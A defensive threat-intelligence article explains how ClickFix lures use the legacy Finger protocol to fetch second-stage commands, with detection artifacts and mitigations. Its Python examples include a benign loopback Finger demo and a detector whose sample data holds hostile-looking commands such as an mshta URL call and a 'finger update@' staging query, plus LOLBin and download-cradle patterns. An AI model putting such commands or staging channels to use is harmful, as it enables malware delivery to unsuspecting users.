A novel twist in the ongoing ClickFix malware campaigns has security researchers observing the abuse of the decades-old Finger protocol. Threat actors are now using this legacy service to retrieve remote commands for execution on compromised Windows devices, adding a layer of operational security to the social engineering technique [1]. This development underscores the continuous evolution of a threat that relies on the user's own actions to bypass automated security controls.
The core ClickFix attack remains a potent social engineering tactic. It manipulates users into executing malicious commands themselves by presenting fake error messages, browser update alerts, or CAPTCHA verifications. A user who believes they are fixing a problem clicks a button that silently copies a malicious command to the clipboard and is then instructed to paste it into the Windows Run dialog or a terminal window, so the attack starts under the user's own privileges [2]. The method is effective because it sidesteps security controls that focus on automated, file-based threats: no exploit and no dropped executable is needed to get the first command running.
For security leadership, the key takeaway is the technique’s widespread adoption and adaptability. ClickFix has been used by a diverse set of threat actors, from prolific spam distributors like TA571 to suspected nation-state groups like UAC-0050 [2]. Its low cost and high effectiveness have led to its commercialization, with “builder” kits now available on cybercrime forums. Defense requires a multi-layered approach combining technical controls with specific user training that explicitly warns against pasting unsolicited commands.
Technical Breakdown of the Finger Protocol Integration
The integration of the Finger protocol represents a significant evolution in the ClickFix attack chain. Historically used for querying user information on remote systems, the protocol is now being repurposed as a simple command-and-control (C2) channel. In this adapted attack flow, the command copied to the user’s clipboard via pastejacking is no longer the full payload delivery script. Instead, it is a shorter command that queries a Finger server. That server responds with the actual, often more complex, PowerShell or batch commands that are then executed on the victim’s machine to download the final malware [1].
This method offers several advantages to attackers. It allows for dynamic command updates without changing the initial lure infrastructure: the attacker can modify the text returned for a Finger query at any time, switching malware families or adjusting evasion techniques on the fly. Furthermore, using a legacy protocol like Finger may help the activity blend in, as many security monitoring tools do not inspect this service because of its perceived obsolescence. This adds a layer of indirection that can complicate detection and analysis. The flip side for defenders is that Finger is a plaintext TCP service on a fixed, well-known port (79), so on a network that logs egress the staging request and the returned command are both visible on the wire.
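To make the exchange concrete, the following Python is an added example (not code from the reporting cited here or from any ClickFix kit): it implements the RFC 1288 query framing on both sides, starts a one-shot Finger server on a loopback ephemeral port instead of TCP/79, and queries it the way a client would. The response table and the `update` query name are constructed for the demo; the server hands back a harmless `echo` string where a real staging server would return the next-stage command.

```python
import socket
import threading

CRLF = b"\r\n"
FINGER_PORT = 79  # IANA-assigned port; the demo binds an ephemeral loopback port instead


def finger_query_bytes(user: str = "", verbose: bool = False) -> bytes:
    """Build an RFC 1288 query: [/W] [user] <CRLF>. An empty user asks for the user list."""
    prefix = b"/W " if verbose else b""
    return prefix + user.encode("ascii") + CRLF


def parse_finger_query(data: bytes):
    """Parse a query as a server would. Returns (verbose, user) or None if unterminated."""
    if not data.endswith(CRLF):
        return None
    line = data[:-2].decode("ascii", errors="replace")
    verbose = line.startswith("/W")
    if verbose:
        line = line[2:].lstrip()
    return verbose, line


def serve_one_query(listener: socket.socket, responses: dict) -> None:
    """Accept one client, read a single query, reply with free-form text, close.
    The protocol imposes no structure on the reply: whatever sits in `responses`
    is sent verbatim, which is exactly why the reply can carry a command string."""
    conn, _ = listener.accept()
    with conn:
        buf = b""
        while not buf.endswith(CRLF) and len(buf) < 512:
            chunk = conn.recv(512)
            if not chunk:
                break
            buf += chunk
        parsed = parse_finger_query(buf)
        user = parsed[1] if parsed else ""
        conn.sendall(responses.get(user, "finger: no such user").encode() + CRLF)


def finger(host: str, port: int, user: str = "") -> str:
    """Client side: connect, send the query, read until the server closes.
    RFC 1288 has no length field, so end-of-reply is signalled by the close."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(finger_query_bytes(user))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode("utf-8", errors="replace")


def run_exchange(responses: dict, user: str) -> str:
    """Spin up a one-shot Finger server on loopback and query it; returns the reply text."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=serve_one_query, args=(listener, responses), daemon=True)
    t.start()
    try:
        return finger("127.0.0.1", port, user)
    finally:
        t.join(timeout=5)
        listener.close()


if __name__ == "__main__":
    # Constructed, benign staging table: the queried "user" selects which text comes back.
    staged = {"update": "echo stage-two-would-run-here"}
    print("wire query :", finger_query_bytes("update"))
    print("wire reply :", repr(run_exchange(staged, "update")))
```

The point to take from the exchange is how little there is to it: the client sends a single `user\r\n` line and the server answers with arbitrary text. Nothing in the protocol distinguishes a staged command from a user's `.plan`, which is why the only reliable network signals are the destination port and the fact that the reply is readable in the clear.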
Expanding Threat Landscape and Campaign Analysis
The threat landscape for ClickFix has expanded considerably since its identification in early 2024. The technique is no longer confined to Windows systems; campaigns have been successfully adapted to target macOS and Linux users. A mid-2025 campaign, for instance, impersonated Spectrum services and used a Bash script that prompted users for their system password to download and execute the Atomic macOS Stealer (AMOS) [2]. The Ohio State University’s security team also warned of a fake DeepSeek AI site that used a drag-and-drop installer for macOS, instructing users to run commands in the Terminal [3].
The sophistication of the lures has also increased. A major shift was the widespread adoption of a fake CAPTCHA theme, much of it based on an open-source toolkit named “reCAPTCHA Phish” available on GitHub [2]. Proofpoint observed this toolkit in active campaigns just days after its release. These lures impersonate services like Cloudflare, claim to “verify you are human,” and use countdown timers and “users verified” counters to create a false sense of urgency and legitimacy [4]. The latest evolution involves embedded video tutorials that walk users through the process of running the malicious code, making the attack feel more authentic and interactive [4].
Detection and Forensic Artifacts for Analysis
For analysts and system administrators, several key artifacts can indicate a ClickFix infection attempt. A primary source of evidence on Windows systems is the RunMRU registry key, located at `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`. This key stores a history of commands executed via the Run dialog: each command sits under a single-letter value name with a trailing `\1` marker, and the `MRUList` value records the order, most recent first. Analysts should look for entries containing living-off-the-land binaries (LOLBins) like `powershell`, `mshta`, or `cmd` followed by URLs, a `finger` query against an external host, or heavily obfuscated arguments. Entries may also contain fake verification messages, such as `✅ “I am not a robot – reCAPTCHA”`, because the lure pads the command with that text so the user sees something reassuring at the end of the Run box [2].
Enabling and reviewing PowerShell logging is another critical step. PowerShell Script Block Logging (event ID 4104 in the `Microsoft-Windows-PowerShell/Operational` log) and Module Logging capture the de-obfuscated script as it is executed, even when the command line the user pasted was heavily obfuscated. For network-based detection, monitoring for outbound connections on port 79 (the default Finger protocol port) to unknown external IP addresses is a strong indicator of compromise, especially when it originates from a user’s workstation shortly after a suspicious Run command; because Finger is plaintext, a packet capture of that session also yields the exact second-stage command. On the endpoint, note that the `finger.exe` client ships with Windows in `System32`, so process-creation telemetry for `finger.exe` launched from an interactive session is worth alerting on directly. EDR solutions can also be configured to alert on suspicious parent-child process relationships, such as `mshta.exe` spawning `powershell.exe`, or `explorer.exe` (the parent of anything launched from the Run dialog) spawning `powershell.exe`, `cmd.exe`, `mshta.exe` or `finger.exe` with a URL or host argument.
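The following Python is an added example of the host and network checks described above, not a tool from the cited reporting. It parses RunMRU values as they would be exported from the hive (the `MRUList` ordering and trailing `\1` markers), tags each command with the ClickFix indicators it matches, and separately flags TCP/79 egress to addresses outside RFC 1918 space. The registry values, the connection records, the indicator patterns and the `example.invalid` / `203.0.113.10` addresses are all constructed for the demo; a real deployment would feed it exported hive data and Sysmon network events.

```python
import ipaddress
import re

# Interpreters and download utilities that ClickFix lures typically drive from the Run dialog.
LOLBINS = ("powershell", "pwsh", "mshta", "cmd", "rundll32", "wscript", "cscript",
           "curl", "certutil", "bitsadmin", "finger")

# Hypothetical indicator patterns, each mapped to a tag. A command must name a LOLBin
# and match at least one pattern to be reported.
INDICATORS = [
    (re.compile(r"https?://\S+", re.I), "remote-url"),
    (re.compile(r"\bfinger(\.exe)?\s+\S+@\S+", re.I), "finger-query"),
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded-command"),
    (re.compile(r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|downloadstring)\b", re.I),
     "download-cradle"),
    (re.compile(r"\s-w(indowstyle)?\s+h(idden)?\b", re.I), "hidden-window"),
    (re.compile(r"i am not a robot|recaptcha|verif(y|ication)", re.I), "fake-verification-text"),
]

# Only RFC 1918 ranges count as internal here; documentation ranges such as 203.0.113.0/24
# are deliberately treated as external so the sample below is flagged.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def runmru_history(values: dict) -> list:
    """Return Run-dialog commands newest-first. RunMRU stores each command under a
    one-letter value name with a trailing '\\1' marker; MRUList gives the order."""
    history = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue
        if data.endswith("\\1"):
            data = data[:-2]
        history.append(data)
    return history


def classify(command: str) -> list:
    """Indicator tags for one command line; an empty list means nothing ClickFix-like."""
    lowered = command.lower()
    if not any(re.search(r"\b" + re.escape(b) + r"(\.exe)?\b", lowered) for b in LOLBINS):
        return []
    return [tag for pattern, tag in INDICATORS if pattern.search(command)]


def scan_runmru(values: dict) -> list:
    """(command, tags) for every suspicious RunMRU entry, newest first."""
    return [(cmd, tags) for cmd in runmru_history(values) if (tags := classify(cmd))]


def scan_connections(records: list) -> list:
    """Flag TCP/79 egress to non-internal addresses: the network-side tell for Finger staging."""
    hits = []
    for rec in records:
        addr = ipaddress.ip_address(rec["dst"])
        if rec["dport"] == 79 and not any(addr in net for net in INTERNAL_NETS):
            hits.append(rec)
    return hits


# Constructed sample data, not taken from a real host.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'mshta https://example.invalid/verify  # ✅ "I am not a robot - reCAPTCHA"\\1',
    "c": "cmd /c finger update@203.0.113.10\\1",
}
SAMPLE_CONNS = [  # shape of a Sysmon event 3 after field extraction
    {"process": "finger.exe", "dst": "203.0.113.10", "dport": 79},
    {"process": "chrome.exe", "dst": "203.0.113.10", "dport": 443},
    {"process": "finger.exe", "dst": "10.0.0.5", "dport": 79},
]

if __name__ == "__main__":
    for cmd, tags in scan_runmru(SAMPLE_RUNMRU):
        print(f"[RunMRU] {tags}: {cmd}")
    for rec in scan_connections(SAMPLE_CONNS):
        print(f"[net]    {rec['process']} -> {rec['dst']}:{rec['dport']}")
```

Two design notes. The LOLBin gate keeps ordinary Run-dialog usage (`notepad`, `calc`, a UNC path) out of the alert stream, which matters because RunMRU is noisy on admin workstations. And the network check deliberately ignores the process name: the page's point is that the protocol itself is the anomaly, so a port-79 connection from any process on a user workstation should be reviewed even if `finger.exe` was renamed or the query was issued from a script.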
Mitigation Strategies and Defense Recommendations
A robust defense-in-depth strategy is required to counter the ClickFix threat. Technical controls form the first line of defense. Application control tools like Windows AppLocker or WDAC can restrict script execution from user-writable locations and block interpreters such as `mshta`, `wscript` and `cscript` for standard users; because the Run dialog launches whatever the user pastes under the user's own token, these rules apply to pasted commands just as they do to double-clicked files. Endpoint protection and EDR solutions should be tuned to flag or block the execution of high-risk binaries like `mshta` and `rundll32` when they are called with suspicious parameters. Network protection features and DNS security solutions can block connections to known malicious C2 domains and IPs early in the attack chain, and an egress policy that simply denies outbound TCP/79 from user subnets removes the Finger staging channel entirely, since almost no business workflow depends on it.
User awareness and training are equally critical. General security vigilance is not sufficient; users need specific training on recognizing ClickFix lures. The guidance from The Ohio State University’s security team is definitive and should be communicated clearly: “DO NOT copy-paste commands of any type if you don’t normally perform this activity as part of your job. Even if you are interacting with a legitimate business or service, there should be no need for you to perform commands in your run dialogue” [3]. This clear, actionable rule can effectively short-circuit the social engineering aspect of the attack.
The resurrection of the Finger protocol within the ClickFix malware delivery chain is a reminder that attackers consistently seek out overlooked or forgotten technologies to achieve their goals. The core technique’s success lies in its psychological manipulation, turning user helpfulness into a vulnerability. As this threat continues to evolve with multi-platform support, video tutorials, and now legacy protocol abuse, a combined approach of stringent technical controls and continuously updated user education remains the most effective defense. Security teams should ensure their monitoring strategies account for the abuse of legacy network services and maintain a high degree of skepticism toward any process that requires manual command execution from an untrusted source.